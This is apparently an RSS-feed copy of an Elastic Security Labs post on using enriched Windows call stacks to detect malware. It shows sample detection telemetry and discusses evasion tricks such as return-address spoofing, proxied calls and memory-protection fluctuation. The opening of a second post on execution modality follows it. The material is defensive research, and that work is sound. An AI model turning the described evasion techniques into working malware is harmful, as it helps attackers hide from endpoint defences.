<p>Stack walking is the recovery of just the return addresses from the heterogeneous data stored on the thread stack. Return addresses need to be stored somewhere for control flow — so stack walking co-opts this existing data to <strong>approximate</strong> a call stack. This is entirely suitable for most debugging and performance profiling scenarios, but slightly less helpful for security auditing. The main issue is that you can’t disassemble backwards. You can always determine the return address for a given call site, but not the converse. The best approach you can take is to check each of the 15 possible preceding instruction lengths and see which disassembles to exactly one call instruction. Even then, all you have recovered is a <em>previous</em> call site — not necessarily the exact <em>preceding</em> call site. This is because most compilers use <a href="https://en.wikipedia.org/wiki/Tail_call">tail call</a> optimisation to omit unnecessary stack frames. This creates <a href="https://youtu.be/9SqDY0wMmHE">annoying scenarios for security</a> like there being no guarantee that the Win32StartAddress function will be on the stack even though it was called.</p>
<p>So what we usually refer to as a call stack is actually a return address stack.</p>
<p>Malware authors use this ambiguity to lie. They either craft trampoline stack frames through legitimate modules to hide calls originating from malicious code, or they coerce stack walking into predicting different return addresses than those the CPU will execute. Of course, malware has always just been an attempt to lie, and antimalware is just the process of exposing that lie.</p>
<p>“... but at the length truth will out.”
- William Shakespeare, The Merchant of Venice, Act 2, Scene 2</p>
<h2>Making call stacks beautiful</h2>
<p>So far, a stack walk is just a list of numeric memory addresses. To make them useful for analysis we need to enrich them with context. (Note: we don’t currently include kernel stack frames.)</p>
<p>The minimum useful enrichment is to convert these addresses into offsets within modules (e.g. <code>ntdll.dll+0x15c9c4</code>). This would only catch the most egregious malware though — we can go deeper. The most important modules on Windows are those that implement the Native and Win32 APIs. The application binary interface for these APIs requires that the name of each function be included in the <a href="https://learn.microsoft.com/en-us/windows/win32/debug/pe-format#the-edata-section-image-only">Export Directory</a> of the containing module. This is the information that Elastic currently uses to enrich its endpoint call stacks.</p>
<p>A more accurate enrichment could be achieved by using the public symbols (if available) <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/microsoft-public-symbols">hosted</a> on the vendor’s infrastructure (especially Microsoft) While this method offers deeper fidelity, it comes with higher operational costs and isn’t feasible for our air-gapped customers.</p>
<p>A rule of thumb for Microsoft kernel and native symbols is that the exported interface of each component has a capitalised prefix such as Ldr, Tp or Rtl. Private functions extend this prefix with a p. By default, private functions with external linkage are included in the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/public-and-private-symbols">public symbol table</a>. A very large offset might indicate a very large function, but it could also just indicate an unnamed function that you don’t have symbols for. A general guideline would be to consider any triple-digit and larger offsets in an exported function as likely belonging to another function.</p>
<table>
<thead>
<tr>
<th align="left">Call Stack</th>
<th align="left">Stack Walk</th>
<th align="left">Stack Walk Modules</th>
<th align="left">Stack Walk Exports (Elastic approach)</th>
<th align="left">Stack Walk Public Symbols</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">0x7ffb8eb9c9c2 <strong>0x12d383f0046</strong> 0x7ffb8eb1a9d8 0x7ffb8eb1aaf4 0x7ffb8ea535ff 0x7ffb8da5e8cf 0x7ffb8eaf14eb</td>
<td align="left">0x7ffb8eb9c9c4 0x7ffb8c3c71d6 0x7ffb8eb1a9ed 0x7ffb8eb1aaf9 0x7ffb8ea53604 0x7ffb8da5e8d4 0x7ffb8eaf14f1</td>
<td align="left">ntdll.dll+0x15c9c4 kernelbase.dll+0xc71d6 ntdll.dll+0xda9ed ntdll.dll+0xdaaf9 ntdll.dll+0x13604 kernel32.dll+0x2e8d4 ntdll.dll+0xb14f1</td>
<td align="left">ntdll.dll!NtProtectVirtualMemory+0x14 kernelbase.dll!VirtualProtect+0x36 ntdll.dll!RtlAddRefActivationContext+0x40d ntdll.dll!RtlAddRefActivationContext+0x519 ntdll.dll!RtlAcquireSRWLockExclusive+0x974 kernel32.dll!BaseThreadInitThunk+0x14 ntdll.dll!RtlUserThreadStart+0x21</td>
<td align="left">ntdll.dll!NtProtectVirtualMemory+0x14 kernelbase.dll!VirtualProtect+0x36 ntdll.dll!RtlTpTimerCallback+0x7d ntdll.dll!TppTimerpExecuteCallback+0xa9 ntdll.dll!TppWorkerThread+0x644 kernel32.dll!BaseThreadInitThunk+0x14 ntdll.dll!RtlUserThreadStart+0x21</td>
</tr>
</tbody>
</table>
<p>Comparison of Call Stack Enrichment Levels</p>
<p>In the above example, the shellcode at 0x12d383f0000 deliberately used a tail call so that its address wouldn’t appear in the stack walk. This lie-by-omission is apparent even with only the stalk walk. Elastic reports this with the <code>proxy_call</code> heuristic as the malware registered a timer callback function to proxy the call to <code>VirtualProtect</code> from a different thread.</p>
<h2><strong>Making call stacks powerful</strong></h2>
<p>The call stacks of the system calls that we monitor with <a href="https://www.elastic.co/kr/security-labs/kernel-etw-best-etw">Event Tracing for Windows</a> (ETW) have an expected structure. At the bottom of the stack is the thread StartAddress - typically ntdll.dll!RtlUserThreadStart. This is followed by the Win32 API thread entry - kernel32.dll!BaseThreadInitThunk and then the first user module. A user module is application code that is not part of the Win32 (or Native) API. This first user module should match the thread’s Win32StartAddress (unless that function used a tail call). More user modules will follow until the final user module makes a call into a Win32 API that makes a Native API call, which finally results in a system call to the kernel.</p>
<p>From a detection standpoint, the most important module in this call stack is the <a href="https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+call_stack_final_user_module&amp;type=code">final user module</a>. Elastic shows this module, including its hash and any code signatures. These details aid in alert triage, but more importantly, they drastically improve the granularity at which we can baseline the behaviours of legitimate software that sometimes behaves like malware. The more accurately we can baseline normal, the harder it is for malware to blend in.</p>
<pre><code class="language-json">{
  &quot;process.thread.Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll|kernelbase.dll|file.dll|rundll32.exe|kernel32.dll|ntdll.dll&quot;,
    &quot;call_stack&quot;: [
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!NtAllocateVirtualMemory+0x14&quot; }, /* Native API */
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!VirtualAllocExNuma+0x62&quot; }, /* Win32 API */
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!VirtualAllocEx+0x16&quot; }, /* Win32 API */
      {
        &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.dll+0x160d8b&quot;, /* final user module */
        &quot;callsite_trailing_bytes&quot;: &quot;488bf0488d4d88e8197ee2ff488bc64883c4685b5e5f415c415d415e415f5dc390909090905541574156415541545756534883ec58488dac2490000000488b71&quot;,
        &quot;callsite_leading_bytes&quot;: &quot;088b4d38894c2420488bca48894db8498bd0488955b0458bc1448945c4448b4d3044894dc0488d4d88e8e77de2ff488b4db8488b55b0448b45c4448b4dc0ffd6&quot;
      },
      { &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.dll+0x7b429&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.dll+0x44a9&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.dll+0x5f58&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\rundll32.exe+0x3bcf&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\rundll32.exe+0x6309&quot; }, /* first user module - typically the ETHREAD.Win32StartAddress module */
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14&quot; }, /* Win32 API */
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21&quot; /* Native API - the ETHREAD.StartAddress module */
      }
    ],
    &quot;call_stack_final_user_module&quot;: {
      &quot;path&quot;: &quot;c:\\users\\user\\desktop\\file.dll&quot;,
      &quot;code_signature&quot;: [ { &quot;exists&quot;: false } ],
      &quot;name&quot;: &quot;file.dll&quot;,
      &quot;hash&quot;: { &quot;sha256&quot;: &quot;0240cc89d4a76bafa9dcdccd831a263bf715af53e46cac0b0abca8116122d242&quot; }
    }
  }
}
</code></pre>
<p>Sample enriched call stack</p>
<p>Call stack final user module enrichments:</p>
<table>
<thead>
<tr>
<th align="left">name</th>
<th align="left">The file name of the call_stack_final_user_module. Can also be &quot;Unbacked&quot; indicating private executable memory, or &quot;Undetermined&quot; indicating a suspicious call stack.</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">path</td>
<td align="left">The file path of the call_stack_final_user_module.</td>
</tr>
<tr>
<td align="left">hash.sha256</td>
<td align="left">The sha256 of the call_stack_final_user_module, or the protection_provenance module if any.</td>
</tr>
<tr>
<td align="left">code_signature</td>
<td align="left">Code signature of the call_stack_final_user_module, or the protection_provenance module if any.</td>
</tr>
<tr>
<td align="left">allocation_private_bytes</td>
<td align="left">The number of bytes in this memory region that are both +X and non-shareable. Non-zero values can indicate code hooking, patching, or hollowing.</td>
</tr>
<tr>
<td align="left">protection</td>
<td align="left">The memory protection for the acting region of pages is included if it is not RX. Corresponds to MEMORY_BASIC_INFORMATION.Protect.</td>
</tr>
<tr>
<td align="left">protection_provenance</td>
<td align="left">The name of the memory region that caused the last modification of the protection of this page. &quot;Unbacked&quot; may indicate shellcode.</td>
</tr>
<tr>
<td align="left">protection_provenance_path</td>
<td align="left">The path of the module that caused the last modification of the protection of this page.</td>
</tr>
<tr>
<td align="left">reason</td>
<td align="left">The anomalous call_stack_summary that led to an &quot;Undetermined&quot; protection_provenance.</td>
</tr>
</tbody>
</table>
<h2>A quick call stack glossary</h2>
<p>When examining call stacks, there are some Native API functions that are helpful to be familiar with. Ken Johnson, now of Microsoft, has provided us with a <a href="http://www.nynaeve.net/?p=200">catalog of NTDLL kernel mode to user mode callbacks</a> to get us started. Seriously, you should pause here and go read that first.</p>
<p>We met RtlUserThreadStart earlier. Both it and its sibling RtlUserFiberStart should only ever appear at the bottom of a call stack. These are the entrypoints for user threads and <a href="https://learn.microsoft.com/en-us/windows/win32/procthread/fibers">fibers</a>, respectively. The first instruction on every thread, however, is actually LdrInitializeThunk. After performing the user-mode component of thread initialisation (and process, if required), this function transfers control to the entrypoint via NtContinue, which updates the instruction pointer directly. This means that it does not appear in any future stack walks.</p>
<p>So if you see a call stack that includes LdrInitializeThunk then this means you are at the very start of a thread’s execution. This is where the application compatibility <a href="https://techcommunity.microsoft.com/blog/askperf/demystifying-shims---or---using-the-app-compat-toolkit-to-make-your-old-stuff-wo/374947">Shim Engine</a> operates, where hook-based security products prefer to install themselves, and where malware tries to gain execution <em>before</em> those other security products. <a href="https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html">Marcus Hutchins</a> and <a href="https://www.outflank.nl/blog/2024/10/15/introducing-early-cascade-injection-from-windows-process-creation-to-stealthy-injection/">Guido Miggelenbrink</a> have both written excellent blogs on this topic. This startup race does not exist for security products that utilise <a href="https://www.elastic.co/kr/security-labs/kernel-etw-best-etw">kernel ETW</a> for telemetry.</p>
<pre><code class="language-json">{
  &quot;process.thread.Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll|file.exe|ntdll.dll&quot;,
    &quot;call_stack&quot;: [
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!ZwProtectVirtualMemory+0x14&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.exe+0x1bac8&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!RtlAnsiStringToUnicodeString+0x3cb&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!LdrInitShimEngineDynamic+0x394d&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x1db&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x63&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0xe&quot; }
    ],
    &quot;call_stack_final_user_module&quot;: {
      &quot;path&quot;: &quot;c:\\users\\user\\desktop\\file.exe&quot;,
      &quot;code_signature&quot;: [ { &quot;exists&quot;: false } ],
      &quot;name&quot;: &quot;file.exe&quot;,
      &quot;hash&quot;: { &quot;sha256&quot;: &quot;a59a7b56f695845ce185ddc5210bcabce1fff909bac3842c2fb325c60db15df7&quot; }
    }
  }
}
</code></pre>
<p>Pre-entrypoint execution example</p>
<p>The next pair is KiUserExceptionDispatcher and KiRaiseUserExceptionDispatcher. The kernel uses the former to pass execution to a registered user-mode structured exception handler after a user-mode exception condition has occurred. The latter also raises an exception, but on behalf of the kernel instead. This second variant is usually only caught by debuggers, including <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/application-verifier">Application Verifier</a>, and helps identify when user-mode code is not sufficiently checking return codes from syscalls. These functions will usually be seen in call stacks related to application-specific crash handling or <a href="https://learn.microsoft.com/en-us/windows/win32/wer/windows-error-reporting">Windows Error Reporting</a>. However, sometimes malware will use it as a pseudo-breakpoint — for example, if they want to <a href="https://github.com/elastic/protections-artifacts/blob/3537aa4ed9c7ed9dcd04da2efafbad38af47a017/behavior/rules/windows/defense_evasion_virtualprotect_via_vectored_exception_handling.toml">fluctuate memory protections</a> to rehide their shellcode immediately after making a system call.</p>
<pre><code class="language-json">{
  &quot;process.thread.Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll|file.exe|ntdll.dll|file.exe|kernel32.dll|ntdll.dll&quot;,
    &quot;call_stack&quot;: [
      {
        &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!ZwProtectVirtualMemory+0x14&quot;,
        &quot;protection_provenance&quot;: &quot;file.exe&quot;, /* another vendor's hooks were unhooked */
        &quot;allocation_private_bytes&quot;: 8192
      },
      { &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.exe+0xd99c&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!RtlInitializeCriticalSectionAndSpinCount+0x1c6&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!RtlWalkFrameChain+0x1119&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!KiUserExceptionDispatcher+0x2e&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.exe+0x12612&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21&quot; }
    ],
    &quot;call_stack_final_user_module&quot;: {
      &quot;name&quot;: &quot;file.exe&quot;,
      &quot;path&quot;: &quot;c:\\users\\user\\desktop\\file.exe&quot;,
      &quot;code_signature&quot;: [ { &quot;exists&quot;: false }],
      &quot;hash&quot;:   { &quot;sha256&quot;: &quot;0e5a62c0bd9f4596501032700bb528646d6810b16d785498f23ef81c18683c74&quot; }
    }
  }
}
</code></pre>
<p>Protection fluctuation via exception handler example</p>
<p>Next is KiUserApcDispatcher, which is used to deliver <a href="https://learn.microsoft.com/en-us/windows/win32/sync/asynchronous-procedure-calls">user APCs</a>. These are one of the favourite tools of malware authors, as Microsoft only provides limited visibility into its use.</p>
<pre><code class="language-json">{
  &quot;process.thread.Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll|kernelbase.dll|ntdll.dll|kernelbase.dll|cronos.exe&quot;,
    &quot;call_stack&quot;: [
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!NtProtectVirtualMemory+0x14&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!VirtualProtect+0x36&quot; }, /* tail call */
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!KiUserApcDispatcher+0x2e&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!ZwDelayExecution+0x14&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!SleepEx+0x9e&quot; },
      {
        &quot;symbol_info&quot;: &quot;c:\\users\\user\\desktop\\file.exe+0x107d&quot;,
        &quot;allocation_private_bytes&quot;: 147456, /* stomped */
        &quot;protection&quot;: &quot;RW-&quot;, /* fluctuation */
        &quot;protection_provenance&quot;: &quot;Undetermined&quot;, /* proxied call */
        &quot;callsite_leading_bytes&quot;: &quot;010000004152524c8d520141524883ec284150415141baffffffff41525141ba010000004152524c8d520141524883ec284150b9ffffffffba0100000041ffe1&quot;,
        &quot;callsite_trailing_bytes&quot;: &quot;4883c428c3cccccccccccccccccccccccccccc894c240857b820190000e8a10c0000482be0488b052fd101004833c44889842410190000488d84243014000048&quot;
      }
    ],
    &quot;call_stack_final_user_module&quot;: {
      &quot;name&quot;: &quot;Undetermined&quot;,
      &quot;reason&quot;: &quot;ntdll.dll|kernelbase.dll|ntdll.dll|kernelbase.dll|file.exe&quot;
    }
  }
}
</code></pre>
<p>Protection fluctuation via APC example</p>
<p>The Windows window manager is implemented in a kernel-mode device driver (win32k.sys). Mostly. Sometimes the window manager needs to do something from user-mode, and KiUserCallbackDispatcher is the mechanism to achieve that. It’s basically a reverse syscall that targets user32.dll functions. Overwriting an entry in a process’s <a href="https://attack.mitre.org/techniques/T1574/013/">KernelCallbackTable</a> is an easy way to hijack a GUI thread, so any other module following this call is suspicious.</p>
<p>Knowledge of the purpose of each of these kernel-mode to user-mode entry points greatly assists in determining if a given call stack is natural or if it has been misappropriated to achieve alternative goals.</p>
<h2>Making call stacks understandable</h2>
<p>To aid understandability, we also tag the event with various process.Ext.api.behaviors that we identify. These behaviours aren’t necessarily malicious, but they highlight aspects that are relevant to alert triage or threat hunting. For call stacks, these include:</p>
<table>
<thead>
<tr>
<th align="left">native_api</th>
<th align="left">A call was made directly to the Native API rather than the Win32 API.</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">direct_syscall</td>
<td align="left">A syscall instruction originated outside of the Native API layer.</td>
</tr>
<tr>
<td align="left">proxy_call</td>
<td align="left">The call stack may indicate a proxied API call to mask the true source.</td>
</tr>
<tr>
<td align="left">shellcode</td>
<td align="left">Second generation executable non-image memory called a sensitive API.</td>
</tr>
<tr>
<td align="left">image_indirect_call</td>
<td align="left">An entry in the call stack was preceded by a call to a dynamically resolved function.</td>
</tr>
<tr>
<td align="left">image_rop</td>
<td align="left">No call instruction preceded an entry in the call stack.</td>
</tr>
<tr>
<td align="left">image_rwx</td>
<td align="left">An entry in the call stack is writable. Code should be read-only.</td>
</tr>
<tr>
<td align="left">unbacked_rwx</td>
<td align="left">An entry in the call stack is non-image and writable. Even JIT code should be read-only.</td>
</tr>
<tr>
<td align="left">truncated_stack</td>
<td align="left">The call stack seems to be unexpectedly truncated. This may be due to malicious tampering.</td>
</tr>
</tbody>
</table>
<p>In some contexts, these behaviours alone may be sufficient to detect malware.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/call-stacks-no-more-free-passes-for-malware/image1.png" alt="SilentMoonwalk variant alerts" /></p>
<h2>Spoofing — bypass or liability?</h2>
<p>Return address spoofing has been a staple <a href="https://www.unknowncheats.me/forum/assembly/88648-spoofing-return-address.html">game hacking</a> and <a href="https://www.welivesecurity.com/2013/08/26/nymaim-obfuscation-chronicles/">malware</a> technique for many, many years. This simple trick allows injected code to borrow the reputation of a legitimate module with few consequences. The goal of deep call stack inspection and behaviour baselines is to stop giving malware this free pass.</p>
<p>Offensive researchers have been assisting this effort by looking into approaches for full call stack spoofing. Most notably:</p>
<ul>
<li><a href="https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs">Spoofing Call Stacks To Confuse EDRs</a> by William Burgess</li>
<li><a href="https://klezvirus.github.io/RedTeaming/AV_Evasion/StackSpoofing/">SilentMoonwalk: Implementing a dynamic Call Stack Spoofer</a> by Alessandro Magnosi, Arash Parsa and Athanasios Tserpelis</li>
</ul>
<p><a href="https://media.defcon.org/DEF%20CON%2031/DEF%20CON%2031%20presentations/Alessandro%20klezVirus%20Magnosi%20Arash%20waldoirc%20Parsa%20Athanasios%20trickster0%20Tserpelis%20-%20StackMoonwalk%20A%20Novel%20approach%20to%20stack%20spoofing%20on%20Windows%20x64.pdf">SilentMoonwalk</a>, in addition to being superb offensive research, is an excellent example of how lying can get you into twice the amount of trouble — but only if you get caught. Many Defense Evasion techniques rely on security-by-obscurity — and once exposed by researchers, they can become a liability. In this case, the research included advice on the detection opportunities <strong>introduced</strong> by the evasion attempt.</p>
<pre><code class="language-json">{
  &quot;process.thread.Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll|kernelbase.dll|kernel32.dll|ntdll.dll&quot;,
    &quot;call_stack&quot;: [
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!NtAllocateVirtualMemory+0x14&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!VirtualAlloc+0x48&quot; },
      {
        &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!CreatePrivateObjectSecurity+0x31&quot;,
        /* 4883c438 stack desync gadget - add rsp 0x38 */
        &quot;callsite_trailing_bytes&quot;: &quot;4883c438c3cccccccccccccccccccc48895c241057498bd8448bd2488bf94885c90f84660609004885db0f845d060900418bd14585c97411418bc14803c383ea&quot;,
        &quot;callsite_leading_bytes&quot;: &quot;cccccccccccccccccccccccccccccc4883ec38488b4424684889442428488b442460488944242048ff15d9b21b000f1f44000085c00f8830300900b801000000&quot;
      },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!Internal_EnumSystemLocales+0x406&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!SystemTimeToTzSpecificLocalTimeEx+0x2d1&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!WaitForMultipleObjectsEx+0x982&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21&quot; }
    ],
    &quot;call_stack_final_user_module&quot;: {
      &quot;name&quot;: &quot;Undetermined&quot;, /* gadget module resulted in suspicious call stack */
      &quot;reason&quot;: &quot;ntdll.dll|kernelbase.dll|kernel32.dll|ntdll.dll&quot;
    }
  }
}
</code></pre>
<p>SilentMoonwalk call stack example</p>
<p>A standard technique for unearthing hidden artifacts is to enumerate them using multiple techniques and compare the results for discrepancies. This is <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/rootkit-revealer#how-rootkitrevealer-works">how RootkitRevealer works</a>. This approach was also used in <a href="https://github.com/jdu2600/conference_talks/blob/main/2023-09-bsidescbr-GetInjectedThreadEx.pdf">Get-InjectedThreadEx.exe</a>, which <a href="https://github.com/jdu2600/Get-InjectedThreadEx/blob/edbff70fc286a3f1c32c6249b3b913d84d70259b/Get-InjectedThreadEx.cpp#L419-L445">climbs up the thread stack</a> as well as walking down it.</p>
<p>In certain circumstances, we may be able to recover a call stack in two ways. If there are discrepancies, then you will see the less reliable call stack emitted as call_stack_summary_original.</p>
<pre><code class="language-json">{
  &quot;process.thread.Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll&quot;,
    &quot;call_stack_summary_original&quot;: &quot;ntdll.dll|kernelbase.dll|version.dll|kernel32.dll|ntdll.dll&quot;,
    &quot;call_stack&quot;: [
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!NtContinue+0x12&quot; },
      { &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!LdrInitializeThunk+0x13&quot; }
    ],
    &quot;call_stack_final_user_module&quot;: {
      &quot;name&quot;: &quot;Undetermined&quot;,
      &quot;reason&quot;: &quot;ntdll.dll&quot;
    }
  }
}
</code></pre>
<p>Call Stack summary original example</p>
<h2>Call Stacks are for everyone</h2>
<p>By default you will only find call stacks in our alerts, but this is configurable through advanced policy.</p>
<table>
<thead>
<tr>
<th align="left">events.callstacks.emit_in_events</th>
<th align="left">If set, call stacks will be included in regular events where they are collected. Otherwise, they are only included in events that trigger behavioral protection rules. Note that setting this may significantly increase data volumes. Default: false</th>
</tr>
</thead>
</table>
<p>Further insights into Windows call stacks is available in the following Elastic Security Labs articles:</p>
<ul>
<li><a href="https://www.elastic.co/kr/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks">Upping the Ante: Detecting In-Memory Threats with Kernel Call Stacks</a></li>
<li><a href="https://www.elastic.co/kr/security-labs/peeling-back-the-curtain-with-call-stacks">Peeling back the curtain with call stacks</a></li>
<li><a href="https://www.elastic.co/kr/security-labs/doubling-down-etw-callstacks">Doubling Down: Detecting In-Memory Threats with Kernel ETW Call Stacks</a></li>
<li><a href="https://www.elastic.co/kr/security-labs/itw-windows-lpe-0days-insights-and-detection-strategies">In-the-Wild Windows LPE 0-days: Insights &amp; Detection Strategies</a></li>
<li><a href="https://www.elastic.co/kr/security-labs/misbehaving-modalities">Misbehaving Modalities: Detecting Tools, not Techniques</a></li>
<li><a href="https://www.elastic.co/kr/security-labs/finding-truth-in-the-shadows">Finding Truth in the Shadows</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/call-stacks-no-more-free-passes-for-malware/Security Labs Images 33.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Misbehaving Modalities: Detecting Tools, Not Techniques]]></title>
            <link>https://www.elastic.co/kr/security-labs/misbehaving-modalities</link>
            <guid>misbehaving-modalities</guid>
            <pubDate>Thu, 15 May 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[We explore the concept of Execution Modality and how modality-focused detections can complement behaviour-focused ones.]]></description>
            <content:encoded><![CDATA[<h2><strong>What is Execution Modality?</strong></h2>
<p><a href="https://medium.com/@jaredcatkinson">Jared Atkinson</a>, Chief Strategist at SpecterOps and prolific writer on security strategy, recently introduced the very useful concept of <a href="https://posts.specterops.io/behavior-vs-execution-modality-3318e8e81739">Execution Modality</a> to help us reason about malware techniques, and how to robustly detect them. In short, Execution Modality describes <em>how</em> a malicious behaviour is executed, rather than simply defining <em>what</em> the behaviour does.</p>
<p>For example, the behaviour of interest might be <a href="https://attack.mitre.org/techniques/T1543/003/">Windows service creation</a>, and the modality might be either a system utility (such as `sc.exe`), a PowerShell script, or shellcode that uses indirect syscalls to directly write to the service configuration in the Windows Registry.</p>
<p>Atkinson outlined that if your goal is to detect a specific technique, you want to ensure that your collection is as close as possible to the operating system’s source of truth and eliminate any modality assumptions.</p>
<h2><strong>Case Study: service creation modalities</strong></h2>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/misbehaving-modalities/flow.png" alt="Service creation operation flow graph" /></p>
<p>In the typical Service creation scenario within the Windows OS, an installer calls <a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/sc-create"><code>sc.exe create</code></a> which makes an <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/6a8ca926-9477-4dd4-b766-692fab07227e"><code>RCreateService</code></a> RPC call to an endpoint in the <a href="https://learn.microsoft.com/en-us/windows/win32/services/service-control-manager">Service Control Manager</a> (SCM, aka <code>services.exe</code>) which then makes syscalls to the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/windows-kernel-mode-configuration-manager">kernel-mode configuration manager</a> to update the <a href="https://learn.microsoft.com/en-us/windows/win32/services/database-of-installed-services">database of installed services</a> in the registry.  This is later flushed to disk and restored from disk on boot.</p>
<p>This means that the source of truth for a running system <a href="https://abstractionmaps.com/maps/t1050/">is the registry</a> (though hives are flushed to disk and can be tampered with offline).</p>
<p>In a threat hunting scenario, we could easily detect anomalous <code>sc.exe</code> command lines - but a different tool might make Service Control RPC calls directly.</p>
<p>If we were processing our threat data stringently, we could also detect anomalous Service Control RPC calls, but a different tool might make syscalls (in)directly or use another service, such as the <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/ec095de8-b4fe-48fb-8114-dea65b4d710e">Remote Registry</a>, to update the service database indirectly.</p>
<p>In other words, some of these execution modalities bypass traditional telemetry such as <a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4697">Windows event logs</a>.</p>
<p>So how do we monitor changes to the configuration manager?  We can’t robustly monitor syscalls directly due to <a href="https://en.wikipedia.org/wiki/Kernel_Patch_Protection">Kernel Patch Protection</a>, but Microsoft has provided <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/filtering-registry-calls">configuration manager callbacks</a> as an alternative. This is where Elastic has <a href="https://github.com/tsale/EDR-Telemetry/pull/58#issuecomment-2043958734">focused our service creation detection</a> efforts - as close to the operating system’s source of truth as possible.</p>
<p>The trade-off for this low-level visibility, however, is a potential reduction in context. For example, due to Windows architectural decisions, security vendors do not know which RPC client is requesting the creation of a registry key in the services database. Microsoft only supports querying RPC client details from a user-mode RPC service.</p>
<p>Starting with Windows 10 21H1, Microsoft began including <a href="https://github.com/jdu2600/Windows10EtwEvents/commit/5444e040d65ed2807fcf9ac69ce32131338dc370#diff-b88b65ff9fd39a51c51c594ee3787ea6907e780d4282ae9a7517c04074e2c2b7">RPC client details in the service creation event log</a>. This event, while less robust, sometimes provides additional context that might assist in determining the source of an anomalous behaviour.</p>
